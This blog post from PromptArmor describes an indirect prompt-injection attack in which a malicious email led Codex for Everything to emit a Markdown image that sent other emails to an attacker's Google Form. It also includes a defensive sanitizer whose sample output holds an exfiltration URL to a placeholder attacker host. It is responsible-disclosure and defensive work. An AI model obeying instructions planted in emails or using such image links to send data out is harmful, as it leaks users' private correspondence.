Source: promptarmor.com · Topic: AI safety

Codex Exfiltrates Connector Data

Researchers at PromptArmor demonstrated that a malicious email could manipulate OpenAI's Codex for Everything to exfiltrate the complete contents of other emails via an indirect prompt injection, sending the data to an attacker-controlled Google Form. The vulnerability was responsibly disclosed on April 21, 2026, and has been remediated by OpenAI.

Published Jun 30, 2026 · 2 min read

Overview #

‘Codex for Everything’ is an update to Codex that enables its use beyond coding, for day-to-day tasks. It includes over 90 new plugins and features, such as ‘browser use’ and ‘computer use’, that make Codex an all-purpose agent in a bid to compete with Anthropic’s Claude Cowork and Microsoft’s Copilot Cowork.

In this article, we demonstrate that a malicious email could manipulate Codex for Everything to exfiltrate the complete contents of other emails Codex was reviewing. Exfiltration occurred when Codex output a malicious image whose URL triggered an automatic submission to an attacker-controlled Google Form.

We demonstrate the vulnerability via an indirect prompt injection in an untrusted email, but an injection in any untrusted data source could exploit the vulnerability across Codex use cases.

This vulnerability was responsibly disclosed on April 21, 2026, and has been remediated by OpenAI. More details on the responsible disclosure are at the end of the article.

The Attack Chain #

### A user asks Codex for help reviewing emails

OpenAI's Email plugin comes with a Skill for triaging emails, and reviewing emails is part of a demonstrated use case in the Codex for Everything release.

### A prompt injection is hidden in one of the emails Codex finds

The user’s inbox contains an email from an external party that includes a prompt injection.

Email content is not displayed to the user during Codex's review process.

### Codex is manipulated to output an insecure image, triggering data exfiltration

Codex is manipulated to generate and output Markdown image syntax that contains a pre-filled Google Form submission link, populated with the victim's email data. When the image is rendered, this automatically submits the victim's emails to an attacker-controlled Google Form.

No user interaction is required beyond submission of the initial email triage query.

### The attacker can view the victim's emails in their Google Form submissions

This attack exfiltrated sensitive emails, including legal correspondence, organizational financial planning, and security-related notifications.
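A defender-side check for the exfiltration step described above, written as an added example (not PromptArmor's or OpenAI's code): it parses Markdown image embeds in agent output and refuses to render any whose URL points at a host outside a hypothetical allowlist or carries an oversized query string. The allowlist host, the placeholder attacker domain and the sample agent output are all constructed.

```python
import re
from urllib.parse import urlparse

# Markdown image embed: ![alt](url) or ![alt](url "title"); <url> form allowed too.
IMAGE_RE = re.compile(r'!\[[^\]]*\]\(\s*(<[^>]*>|[^\s)]+)(?:\s+"[^"]*")?\s*\)')

# Hypothetical allowlist: the only hosts the rendering surface may fetch images
# from. Any other host, attacker-controlled form endpoints included, is blocked.
ALLOWED_IMAGE_HOSTS = {"static.example-internal.test"}

# A query string longer than this looks like a data channel, not an image ref.
MAX_QUERY_LEN = 64

def classify_image_url(url: str) -> str:
    """Return 'allow', or a short reason for refusing to render the image."""
    parts = urlparse(url)
    if parts.scheme not in ("http", "https"):
        return "non-http scheme"
    if parts.hostname not in ALLOWED_IMAGE_HOSTS:
        return "untrusted host"
    if len(parts.query) > MAX_QUERY_LEN:
        return "oversized query string"
    return "allow"

def sanitize_agent_output(markdown: str):
    """Swap failing image embeds for a placeholder; return (cleaned, blocked)."""
    blocked = []  # (url, reason) tuples for logging and alerting

    def replace(match):
        url = match.group(1).strip("<>")
        verdict = classify_image_url(url)
        if verdict == "allow":
            return match.group(0)  # trusted image, keep untouched
        blocked.append((url, verdict))
        return f"[image blocked: {verdict}]"

    return IMAGE_RE.sub(replace, markdown), blocked

# Constructed sample of agent output after an injected email steered the model:
# the second embed carries email text in its query string to a placeholder
# attacker host, so fetching it would be the exfiltration step.
SAMPLE_OUTPUT = (
    "Inbox triage complete.\n\n"
    "![logo](https://static.example-internal.test/logo.png)\n"
    "![ ](https://forms.attacker.example/r?entry.1=Subject%3A+Q3+budget"
    "&entry.2=Body%3A+legal+correspondence+attached)\n"
)

if __name__ == "__main__":
    print(sanitize_agent_output(SAMPLE_OUTPUT))
```

Running the policy before rendering, rather than after, is what matters: the request that performs the submission is the image fetch itself, so a blocked embed must never reach the renderer.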

Responsible Disclosure #

This vulnerability was responsibly disclosed on Apr 21, 2026, and has been remediated by OpenAI.

Timeline

Apr 21, 2026: PromptArmor discloses to OpenAI via HackerOne

May 6, 2026: HackerOne requests additional details

May 6, 2026: PromptArmor follows up

May 14, 2026: HackerOne validates and triages the vulnerability

May 21, 2026: Public disclosure
